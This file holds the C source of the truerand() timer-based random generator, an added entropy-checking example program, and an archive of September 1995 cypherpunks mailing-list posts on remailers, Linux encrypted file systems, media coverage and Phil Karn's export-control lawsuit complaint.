 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
 */

/*
 * WARNING: depending on the particular platform, truerand() output may
 * be biased or correlated.  In general, you can expect about 16 bits of
 * "pseudo-entropy" out of each 32 bit word returned by truerand(),
 * but it may not be uniformly diffused.  You should therefore run
 * the output through some post-whitening function (like MD5 or DES or
 * whatever) before using it to generate key material.  (RSAREF's
 * random package does this for you when you feed truerand() bits to the
 * seed input function.)
 *
 * Test these assumptions on your own platform before fielding a system
 * based on this software or these techniques.
 *
 * This software seems to work well (at 16 bits per truerand() call) on
 * a Sun Sparc-20 under SunOS 4.1.3 and on a P100 under BSDI 2.0.  You're
 * on your own elsewhere.
 */

#include <signal.h>
#include <setjmp.h>
#include <sys/time.h>
#include <math.h>
#include <stdio.h>

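/* sigjmp_buf: the jump out of the handler must restore the signal mask,
 * otherwise SIGALRM can stay blocked where setjmp() does not save it */
static sigjmp_buf env;
static volatile unsigned count;	/* spun in roulette(), read in the handler */
static unsigned ocount;
static unsigned buffer;

/* arm a one-shot real-time timer of about 1/60 second */
static void
tick(void)
{
	struct itimerval it, oit;

	timerclear(&it.it_interval);
	it.it_value.tv_sec = 0;
	it.it_value.tv_usec = 16665;
	if (setitimer(ITIMER_REAL, &it, &oit) < 0)
		perror("tick");
}

/* SIGALRM handler: leave the counting loop once it has made progress */
static void
interrupt(int sig)
{
	(void) sig;
	if (count)
		siglongjmp(env, 1);
	(void) signal(SIGALRM, interrupt);
	tick();
}

/* spin a counter until the timer fires, then fold 3 bits into buffer */
static unsigned long
roulette(void)
{

	if (sigsetjmp(env, 1)) {
		count ^= (count>>3) ^ (count>>6) ^ ocount;
		count &= 0x7;
		ocount=count;
		buffer = (buffer<<3) ^ count;
		return buffer;
	}
	(void) signal(SIGALRM, interrupt);
	count = 0;
	tick();
	for (;;)
		count++;	/* about 1 MHz on VAX 11/780 */
}

/* eleven 3-bit rounds fill one 32-bit word */
unsigned long
truerand(void)
{

	count=0;
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	return roulette();
}

/* value in [0, n) by rejection sampling, so the modulus adds no bias */
int
n_truerand(int n)
{
	int slop, v;

	slop = 0x7FFFFFFF % n;
	do {
		v = truerand() >> 1;
	} while (v <= slop);
	return v % n;
}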
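
The header comment asks you to test the 16-bits-per-word assumption on your own platform; the block below is a first-order check for that, splitting each word into the ten whole 3-bit symbols that roulette() shifted in and reporting bit balance, adjacent repeats and a most-common-value min-entropy estimate. It is an added example, not part of Matt Blaze's message or the AT&T code. The names analyze_words, meets_claim and demo are assumptions, and the sample words are constructed.

```c
/* Added example: first-order checks on raw truerand()-style output.
 * Function names and sample data are constructed for illustration. */
#include <stddef.h>
#include <stdio.h>

#define SYM_BITS     3	/* roulette() keeps count & 0x7 */
#define SYM_PER_WORD 10	/* whole 3-bit symbols in the low 30 bits of a word */
#define NSYM         8

struct raw_stats {
	size_t n;		/* 3-bit symbols examined */
	size_t ones;		/* set bits among the 3*n bits */
	size_t repeats;		/* symbols equal to their predecessor */
	size_t max_count;	/* occurrences of the most common symbol */
	double min_entropy;	/* -log2(max_count / n), bits per symbol */
};

/* log2(x) for x >= 1 by shift-and-square, so no libm is needed. */
static double log2_ge1(double x)
{
	double r = 0.0, frac = 0.5;
	int i;

	while (x >= 2.0) { x /= 2.0; r += 1.0; }
	for (i = 0; i < 40; i++) {
		x *= x;
		if (x >= 2.0) { x /= 2.0; r += frac; }
		frac /= 2.0;
	}
	return r;
}

/* Split each word into its ten low 3-bit symbols, oldest first, and tally. */
int analyze_words(const unsigned long *w, size_t nwords, struct raw_stats *st)
{
	size_t counts[NSYM] = {0};
	size_t i;
	int k, prev = -1;

	if (w == NULL || nwords == 0 || st == NULL)
		return -1;
	st->n = st->ones = st->repeats = st->max_count = 0;
	for (i = 0; i < nwords; i++) {
		for (k = SYM_PER_WORD - 1; k >= 0; k--) {
			int s = (int)((w[i] >> (SYM_BITS * k)) & 0x7);

			counts[s]++;
			st->ones += (size_t)((s & 1) + ((s >> 1) & 1) + ((s >> 2) & 1));
			if (s == prev)
				st->repeats++;
			prev = s;
			st->n++;
		}
	}
	for (k = 0; k < NSYM; k++)
		if (counts[k] > st->max_count)
			st->max_count = counts[k];
	st->min_entropy = log2_ge1((double)st->n / (double)st->max_count);
	return 0;
}

/* Does the most-common-value estimate support `bits` of entropy per word? */
int meets_claim(const struct raw_stats *st, double bits)
{
	return st->min_entropy * SYM_PER_WORD >= bits;
}

/* Constructed samples: biased == 0 cycles through all eight symbols;
 * biased != 0 makes every other symbol a 5, as a stuck counter might. */
int demo(int biased, struct raw_stats *st)
{
	static const unsigned char other[7] = {0, 1, 2, 3, 4, 6, 7};
	unsigned long words[4] = {0, 0, 0, 0};
	int i;

	for (i = 0; i < 4 * SYM_PER_WORD; i++) {
		unsigned s = (unsigned)(i % NSYM);

		if (biased)
			s = (i % 2 == 0) ? 5u : other[(i / 2) % 7];
		/* same packing as roulette(): buffer = (buffer<<3) ^ count */
		words[i / SYM_PER_WORD] = (words[i / SYM_PER_WORD] << SYM_BITS) ^ s;
	}
	return analyze_words(words, 4, st);
}

int main(void)
{
	struct raw_stats st;
	int b;

	for (b = 0; b <= 1; b++) {
		if (demo(b, &st) != 0)
			return 1;
		printf("%s: n=%lu ones=%lu repeats=%lu max=%lu "
		       "H_min=%.3f bits/symbol, 16-bit claim %s\n",
		       b ? "biased" : "balanced", (unsigned long)st.n,
		       (unsigned long)st.ones, (unsigned long)st.repeats,
		       (unsigned long)st.max_count, st.min_entropy,
		       meets_claim(&st, 16.0) ? "plausible" : "not supported");
	}
	return 0;
}
```

The most-common-value figure is only an upper bound when successive symbols are correlated, so a passing result does not replace the post-whitening step the header comment calls for.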







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 24 Sep 95 18:08:22 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Cybersecurity
In-Reply-To: <Pine.SUN.3.91.950921061134.12901A-100000@panix.com>
Message-ID: <9509250107.AA05910@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Thu, 21 Sep 1995 06:13:40 -0400 (EDT)
    From: Duncan Frissell <frissell@panix.com>

    On Thu, 7 Sep 1995 hallam@w3.org wrote:

    > The UK Labour party is opposed to key escrow "we do not accept
    > the "clipper chip" argument". The Tories have less than half the
    > level of popular support and are barely recognisable as a
    > government.
    > 
    >         Phill

    Wait till Labour finds out that crypto makes "The Caring Society" 
    impossible.  Perhaps they'll change their view then.

Ok, I'll bite.  What do you mean?

I'm guessing that you're talking about the fact that fully applied
crypto (e. g. fully anonymous digital cash) makes it essentially
impossible to base a tax system on income.

With full application in place, a government would be forced to shift
the basis of the tax system toward `real assets' and the receiving of
goods and services within its borders.  However, outside of
transactions involving pure information exchange, this simply shifts
things from one side to the other in a relationship where the basic
ideas behind capitalism suggest that both sides should be more or less
equal.  That is, you're not taxed based on money changing hands, but
rather on the more tangible things that are the reason for the money
changing hands.  To use the over-used grocery store example, you're
taxed on what you carry out in your basket, without regard to any
money that may or may not have changed hands before during or after
you went to the store.

Earnings tend to correlate reasonably well with receiving goods and
services, at least over long periods of time.  Also most people are
more or less tied to a certain area of the world.  Certainly there are
exceptions, but the average case is more relevant when considering
what sorts of governmental policies are possible.  Given this, I think
that crypto is more likely to result in a readjustment of the details
than a fundamental change in the relationships between various
elements of society.  I don't mean to suggest that these relationships
can't or won't change, just that strong crypto is not a magic pill
that can transform everything by itself.  Fundamental changes are the
results of the interplay of a wide array of forces.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Freedom Remailer <mixmaster@gondolin.org>
Date: Sun, 24 Sep 95 19:49:38 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509250241.VAA12182@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain


> Newsgroups: alt.privacy.anon-server
> From: shamrock@netcom.com (Lucky Green)
> Subject: The subtle danger of using Mixmaster
> Message-ID: <shamrock-2409951151310001@192.0.2.1>
> Sender: shamrock@netcom19.netcom.com
> Organization: NETCOM On-line Communication Services (408 261-4700 guest)
> X-Newsreader: Yet Another NewsWatcher 2.0
> Date: Sun, 24 Sep 1995 19:51:30 GMT
> Lines: 19
> 
> There are about twenty Mixmaster remailers. Reason to celebrate? Hardly.
> Though we have more remailers than ever, I doubt that the twenty or so
> Mixmasters are operated by more than six or seven people. I would not be
> surprised to find out that some folks are running several Mixmasters on
> the _same_ machine, using different IP addresses.
> 
> While the enthusiasm for increasing the number of remailers is
> understandable, the operation of more than one Mixmaster by the same
> person is downright dangerous, because it reduces the effective length of
> the remailer chain. The message that you sent through five remailers may
> have only been handled by two operators. When you thought that five people
> had to collaborate to trace your email, only two are in fact required to do
> so.
> 
> Comments?
> 
> -- 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 24 Sep 95 21:51:52 PDT
To: lethin@ai.mit.edu (Rich Lethin)
Subject: Re: macworld crypto articles
In-Reply-To: <199509241745.NAA20271@toast.ai.mit.edu>
Message-ID: <9509250445.AA19394@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> In article <4444rl$nrh@life.ai.mit.edu> Chen writes:
> > It's truly a deplorable state of affairs.
> 
> For the next version, include PGP free with every version of Quicken,
> and have Quicken just "call" PGP.
> 
> Of course, users can encrypt their files now with PGP.  Is there an
> Intuit bboard where someone could post instructions?

This is a good idea.  I'll bring it up with the appropriate people.

Right now, we only have some cheesy forums going on Compuserve and
Prodigy; however, keep your eyes peeled.  We have other stuff in the
works.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike_Spreitzer.PARC@xerox.com
Date: Sun, 24 Sep 95 22:30:44 PDT
To: cypherpunks@toad.com
Subject: secure file system for Linux?
Message-ID: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there a secure file system (or secure directory branch) for Linux?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bret@bjohns.win.net (Bret A. Johnson)
Date: Sun, 24 Sep 95 19:59:07 PDT
To: cypherpunks@toad.com
Subject: What version of PGP?
Message-ID: <1903@bjohns.win.net>
MIME-Version: 1.0
Content-Type: text/plain


I got PGP 262 off MIT.

The file was PGP262si.tar

Is this the international version with weak crypto? Or is it the US
version?

Thanks....
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mch@squirrel.com (Mark C. Henderson)
Date: Sun, 24 Sep 95 23:08:06 PDT
To: cypherpunks@toad.com
Subject: Re: secure file system for Linux?
Message-ID: <199509250608.XAA17676@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


> Is there a secure file system (or secure directory branch) for Linux?

Yes, you can use CFS, which works on several versions of UNIX as well
as Linux.

Send email to cfs@research.att.com to get a copy. Someone exported
it, and it is also available from
ftp://ftp.hacktic.nl/pub/crypto/CRYPTOapps/cfs.1.3.tar.gz

There is also something called the "loop filesystem" for Linux. I haven't
tried it and don't know how well it would integrate into the newer
Linux kernels. ftp://tsx-11.mit.edu/pub/linux/BETA/loop

-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.netcom.com/pub/he/henderso/change-sun-hostid-1.5.0.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 24 Sep 95 20:50:11 PDT
To: rsalz@osf.org
Subject: Re: Defense against a class of programming bugs
Message-ID: <9509250349.AA27055@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Unfortunately, strdup is not posix compliant.  If you want to use
>it and maintain portability, you'll have to write your own.

Er, you're kidding, right?  drand48 isn't in Posix either, for example.
Someone who runs on Motif and Mac has strdup as the least of their
worries.  But just in case it's stopping anyone:
	char *strdup(const char *x) { char *p;
	    return (p = malloc(strlen(x) + 1)) ? strcpy(p, x) : 0;
	}
(Deliberately written too-cleverly.  Lame compilers will need to cast to 0)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Sun, 24 Sep 95 20:50:36 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: John Deutsch
Message-ID: <Pine.A32.3.91.950924234920.4788G-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Is coming to Yale tomorrow and I'm going to get the opportunity to have 
tea with him(and about 10 other folks).

Is there anyone here that has anything that they want me to ask the man?  

Ben.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMGYm+r5ALmeTVXAJAQFeIQL9FmuCB93W4XANBdyQBOg224WW/sVetRI8
AZhM3HHjvNJ41YT7LCnRjLeRU1nUeBX1cI5MWBLNmKQXqR8+XmqboVU/k3jOxndy
bNhH4rqb/zgH1cD65lo7IbTsVOJoHeDe
=18Lm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 24 Sep 95 20:57:27 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Patents and trade secrets was: Encryption algorithms used in
In-Reply-To: <306319E6@hamachi>
Message-ID: <9509250357.AA21926@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David van Wie misattributed thus:

> Perry E. Metzger at Sep 22, 95 01:19:37 am wrote:
> 
> >David Van Wie writes:
> >> It just moves the prior art date from the date of invention to the date
> >> of filing the patent application.
> 
> >What happens if the chronology goes like this ?
> >
> >(0) Alice invents a snaffleblort.
> >(1) Bob invents a snaffleblort.
> >(2) Bob files for a patent on a snaffleblort.
> >
> >From what you said, it would appear that Alice's prior art won't count when
> >it comes to considering the validity of Bob's patent claim. Is that correct?

I actually asked those questions, not Perry. Check your attributions, please.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 24 Sep 95 21:03:36 PDT
To: owner-cypherpunks@toad.com
Subject: Re:  John Deutsch
Message-ID: <9509250402.AA27079@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Is there anyone here that has anything that they want me to ask the man?  

Why did he argue against MIT getting rid of Lincoln Labs?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 25 Sep 95 00:05:17 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape giving away T-shirts?
Message-ID: <199509250705.AAA26210@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:33 PM 9/24/95 -0700, you wrote:
>	My ex-gf just told me on the phone that her boss mentioned
>that Netscape was giving away T-shirts to people who found holes.
>Apparently her boss saw this on the news. Interesting. ;-)
>
>	(For the over-stressed and/or humor-impaired: I'm not implying
>that netscape is giving away t-shirts, just commenting on the accuracy
>of the media.)

Considering that they do give out a fair amount of shirts, they might
actually be doing this now.  (If it was for bugs they would owe me quite a
few shirts. ];>)

If they offer you a shirt, ask for one of the "Mosaic Communications
Corporation" t-shirts.  (The one with the old version of Mozilla on the
back.)  They are evidently considered a status symbol at Netscape corporate.
(And, no, you cannot have mine.)

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Mon, 25 Sep 95 00:11:09 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509250706.AAA26206@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


<Yet Another Alarmist TV Show About Child Molesters on the Net:
<snip>
<Anyway, the mainstream media trashing of the Net continues.

And the trashing will continue.  It is the classic scenario.
Feed the media negative press clips about the entity you wish
to discredit (here, the Net), e.g.:
1.  All those pedophiles out to lure your children;
2.  Big coverage on catching some of those pedophiles;
3.  First page coverage on breaking Netscape's code with the
    headlines that your sensitive information such as your
    credit card numbers, etc. can be retrieved (ignoring that
    the reason was to show Netscape's poorly structured code
    would allow this and, therefore, preventing it before it
    could happen);
4.  Expect cryptology to crop up in the Oklahoma bombing trial.
    There already have been articles of those involved having
    allegedly used that *damned* Net to correspond.

Now, the stage is set.  The general public will demand that the
Net (the bastion of perverts and radicals) be controlled,
monitored, and censored - all as a result of a carefully
planned methodology of those specific powers that be.  Having
the general public believe that their children and the national
security are being threatened makes it a much easier task for
*them* to attain their goals.  After all, who wants to be
bothered with proposed legislation when you can have Jane and
John Doe yelling for what may have taken *them* a while to 
attain by "normal" routes?
Never underestimate....


Pathfinder







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Sun, 24 Sep 95 22:22:41 PDT
To: cypherpunks@toad.com
Subject: Colin Powell coming to Dallas
Message-ID: <199509250514.AAA12608@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Colin Powell will be in Dallas at the Taylor's Bookstore out on Belt Line 
Rd. and Prestonwood (right next to Prestonwood Mall).  October 3 at 6 
PM.  I plan to be there - anyone else from the DFW area going?  Anyone 
have any questions they want asked (other than the usual "where do you 
stand on the administration's position regarding the use and exportation 
of so-called 'strong crypto' and the Clipper/Capstone fiasco"?
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGY6vSS9AwzY9LDxAQGLeQP/R9wlGd5wRImcP/37nX9oxAA8+ob2+QHX
uCSgdVQOBEYWCEcUXXioa4YgOJx/aptrQBUI23IudEJMMbXTVnQeZx8DPFbzLERI
cva9aHTVcQwp/tqOa8NSjvm5UtOC9YtSlyyfFDaH4Amai2dYUPFFZXhhLp6O6jLt
PZ56cNfMRYk=
=iIKo
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 24 Sep 95 21:28:51 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Net KiddiePorn Hype on TV
Message-ID: <9509250428.AA22310@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Yet Another Alarmist TV Show About Child Molesters on the Net:

During their coverage of an NFL game on Sunday, the Fox announcers plugged
an upcoming episode (sometime this week) of _New York Undercover_. They
used a depressing line like "Think the Net is a safe place to play ?  Think
again !"  Apparently the show will portray a child molester luring kids via
the Net, etc., etc. "In a story pulled straight from today's headlines !"

Anyway, the mainstream media trashing of the Net continues. Check your local
listings.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Sun, 24 Sep 95 23:52:53 PDT
To: Mike_Spreitzer.PARC@xerox.com
Subject: Re: secure file system for Linux?
In-Reply-To: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com>
Message-ID: <199509250630.BAA14157@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Is there a secure file system (or secure directory branch) for Linux?

The only one I know of is Matthew Blaze's CFS.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGZMgiS9AwzY9LDxAQFChwQAofOU1QkLKwhYYxO7GFvmFk03w3mFv/nb
J4QIkpFK85m1GIjlgl1rwb5sOWWoMkE/OeSRWQ6hm7OhF5VWl9NdfbqDJJBZO7pf
OUj1YjlegF3s1hFDyqv0qIgceSqhN5tEVtA6K5jdOP1mTNF/L8ODmcMKIHzrArD7
UEFKaUd5XiU=
=17aw
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Mon, 25 Sep 95 01:35:10 PDT
To: cypherpunks
Subject: Phil Karn's legal case is filed; here's the Complaint.
Message-ID: <9509250835.AA05551@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Full info is at http://www.qualcomm.com/people/pkarn/export/index.html.

UNITED STATES DISTRICT COURT
FOR THE DISTRICT OF COLUMBIA

____________________________________
                                                )
PHILIP R. KARN, JR.                             )
7431 Teasdale Avenue                            )
San Diego, California  92122                    )
                                                )
                Plaintiff,                      )
                                                )
        v.                                      )
                                                )
U.S. DEPARTMENT OF STATE                        ) Case 1:95CV01812
2201 C Street, N.W.                             )
Washington, D.C.  20520                         )
                                                )
        and                                     )
                                                )
THOMAS E. MCNAMARA                              )
Assistant Secretary                             )
Bureau of Political-Military Affairs            )
U.S. Department of State                        )
Room 7325                                       )
2201 C. Street, N.W.                            )
Washington, D.C. 20520                          )
                                                )
                 Defendants.                    )
                                                )
____________________________________            )

COMPLAINT

COMES NOW the plaintiff PHILIP R. KARN, JR., by and through his undersigned
counsel of record, and for his causes of action against the named Defendants
states the following:

1. Plaintiff PHILIP R. KARN, JR. is a resident of San Diego, California.

2. Defendants, U.S. DEPARTMENT OF STATE and THOMAS E. MCNAMARA, Assistant
Secretary of the U.S. Department of State of the United States of America,
proceeded against in his official capacity, are charged with, inter alia,
the administration of the Arms Export Control Act ("The Act"), 22 U.S.C.
2778 et seq., and the International Traffic in Arms Regulations ("The ITAR")
22 C.F.R. Subchapter M. (Subsequent citations to the ITAR are with a section
designator only.)

3. This is an action for a declaratory judgment pursuant to 28 U.S.C. 2201,
for the purpose of determining a question of actual controversy between the
parties as is herein more fully set forth.

Jurisdiction and Venue

4. Jurisdiction of this action is based on 28 U.S.C. 1331, in that it is a
civil action arising under the laws of the United States, and the First and
Fifth Amendments to the Constitution of the United States.

5. Venue is proper in this Court pursuant to 28 U.S.C. 1391, in that this is
a civil action against an officer of the United States and the decisions,
which are the subject of this action, were made within the District of
Columbia.

Causes of Action

6. Plaintiff KARN hereby realleges and incorporates by reference, as though
fully set forth herein, the allegations of paragraphs 1-5.

7. The ITAR is implemented by the Office of Defense Trade Controls ("the
Office").

8. Under § 120.2 of the ITAR, the Office is responsible for reviewing and
determining whether particular products and technologies are defense
articles, as defined at § 120.6, technical data, as defined at § 120.10, or
defense services, as defined at § 120.9, and, therefore, subject to the
prior export licensing requirements of the ITAR. Such articles, services and
technical data are described in § 121.1, which is styled the United States
Munitions List ("the USML"). Products and technologies, which are neither
defense articles nor defense services, as defined in the ITAR, are subject
to the export licensing jurisdiction of the Department of Commerce.

9. The ITAR provides a procedure for the determination of whether a
particular product or technology is subject to its licensing requirements.
See § 120.4. Upon receipt of a written Commodity Jurisdiction Request, a
determination is made as to whether an item is included on the USML. A
"commodity jurisdiction" procedure entailing consultations among the
Departments of State, Commerce, and Defense is used to make the
determination.

10. Under § 120.10, information that is in "the public domain" is not
subject to the ITAR's export licensing controls.

11. Pursuant to § 120.4, Plaintiff KARN on February 12, 1994 initially
submitted a Commodity Jurisdiction Request for Applied Cryptography, a book
("the Book") by Bruce Schneier, which was published in this country.

12. The Book was published by John Wiley & Sons, Inc. It is available from
most bookstores that carry computer books and has a list price of $44.95. It
has sold approximately 20,000 copies worldwide.

13. The Book contains computer source codes, detailed descriptions and
instructions on how to use a wide variety of cryptographic algorithms, and
explains how computer programmers designing computer applications, networks
and storage systems can use cryptography to maintain the privacy and
security of computer data.

14. Cryptography is a mathematical technique used to protect the secrecy of
electronic communications between individuals by scrambling, or encrypting,
communications so that only particular recipients with a "key" to decrypt
the communications may decipher them. Cryptographic software programs that
protect the confidentiality of electronic communications are created by
using programming instructions, or source code algorithms. These are
sophisticated mathematical equations that are expressed in computer source
code and converted into computer programs. Cryptography has a variety of
commercial uses including confidentiality of electronic mail, computer
software, voice, video and other information in digitized form.

15. Part Five of the Book contains a full-text actual source code listing
for fourteen cryptographic algorithms in the C programming language, which
were developed by various sources at various times using both private and
public sources of funding. A two-disk cryptographic source code set ("the
Diskette Set"), which includes the same codes printed on pages 456-570 of
Part Five of the Book, is offered for sale on its last page.

16. Binary copies of several of the source code algorithms published in Part
Five of the Book are also publicly available from anonymous file transfer
protocol ("FTP") sites outside the United States.

17. In a letter dated March 2, 1994, the Office concluded that the Book,
including the source code in Part Five, was in "the public domain." The Book
was accordingly transferred to the export jurisdiction of the Department of
Commerce, where it is eligible for export to all destinations under a
general license. (A general license is one which is generally available and
need not be specifically applied for in advance of any export.)

18. The March 2, 1994 ruling from the Office expressly did not extend to the
Diskette Set.

19. On March 9, 1994, Plaintiff KARN submitted a second Commodity
Jurisdiction Request ("the Second Filing") for a determination as to whether
a Diskette ("the Diskette") containing only the source code information, as
set out in Part Five of the Book, was subject to the export licensing
requirements of the ITAR. The only difference between the information
contained on the Diskette and Part Five of the Book is the medium used:
magnetic pulses on Mylar instead of inked characters on paper.

20. Plaintiff KARN is desirous of exporting the Diskette to fulfill his
interest in the dissemination of cryptographic information.

21. The Office responded to the Second Filing on May 11, 1994 and stated
that the Diskette is a defense article under Category XIII(b)(1) of the USML
and, therefore, subject to the export licensing jurisdiction of the ITAR.

22. On June 7, 1994 Plaintiff KARN appealed the May 11, 1994 determination
of the Office to the Deputy Assistant Secretary of State for Export Controls
("the DAS").

23. On October 7, 1994 the DAS responded to Plaintiff's appeal by affirming
the Office's determination and concluding that the Diskette was a defense
article because it was cryptographic software, notwithstanding the fact that
the information it contains is identical to that in the Part Five of the
Book.

24. Pursuant to § 120.4(g), the DAS's determination was appealed to the
Assistant Secretary of State for Political-Military Affairs on December 5,
1994.

25. On June 13, 1995 the Assistant Secretary of State for Political-Military
Affairs ("the Assistant Secretary") reaffirmed the DAS's determination but
failed to address the fact that the information contained in the Diskette is
identical to that in Part Five of the Book, which was already found not to
be subject to the licensing jurisdiction of ITAR.

26. No additional appeals mechanism is set forth in the ITAR with respect to
commodity jurisdiction determinations.

27. Plaintiff has exhausted his administrative remedies, therefore, this
matter is "ripe" for judicial review.

28. The application of the ITAR provisions to Plaintiff KARN, which require
the application for and issuance of a license prior to any export, has
caused him unusual hardship and irreparable injury in that he has been and
is currently being denied the free exercise of constitutional rights as more
fully stated below. Plaintiff has no adequate remedy at law for these
injuries; accordingly, he is entitled to declaratory relief.

29. The actions of Defendants restricting the dissemination of information
contained on the Diskette, which is identical to the information contained
in Part Five of the Book, are arbitrary and capricious, constitute an abuse
of discretion and are otherwise not in accordance with the Administrative
Procedure Act ("the APA") at 5 U.S.C. 706(2)(A).

30. As set forth below, the actions of Defendants restricting the
dissemination of information contained on the Diskette, which is identical
to the information contained in Part Five of the Book, are contrary to
Plaintiff's constitutional rights and, therefore, not in accordance with the
APA at 5 U.S.C. 706(2)(B).

31. The Office's determination, and its subsequent reaffirmation by the DAS,
and the Assistant Secretary subjecting the Diskette to export licensing
controls when the information it contains is identical to the published text
of Part Five of the Book, which was deemed not subject to such export
controls, is irrational, arbitrary, and capricious. These arbitrary and
capricious actions violate Plaintiff's Fifth Amendment right to substantive
due process.

32. The Office's determination, and its subsequent reaffirmation by the DAS
and the Assistant Secretary, to control the export of the Diskette
containing information set forth in a published book is a violation of
Plaintiff's fundamental First Amendment right to free speech.

33. As applied by Defendants, the ITAR requires Plaintiff to apply for a
license to export the Diskette containing information identical to that in
Part Five of the Book. Therefore, as applied to Plaintiff in this instance,
the prior licensing requirement of the ITAR operates as a prior restraint on
Plaintiff's disclosure of ideas and information in violation of his First
Amendment rights to free speech.

34. As applied to Plaintiff, § 120.4 dealing with the determination of
whether particular products and technologies are defense articles, is
unconstitutionally overbroad and vague, as it includes within its scope
speech protected by the First Amendment, namely material contained in the
Book, thereby chilling the exercise of free speech rights.

Prayer for Relief

WHEREFORE, Plaintiff KARN prays for judgment against Defendants, U.S.
DEPARTMENT OF STATE and MCNAMARA, as follows:

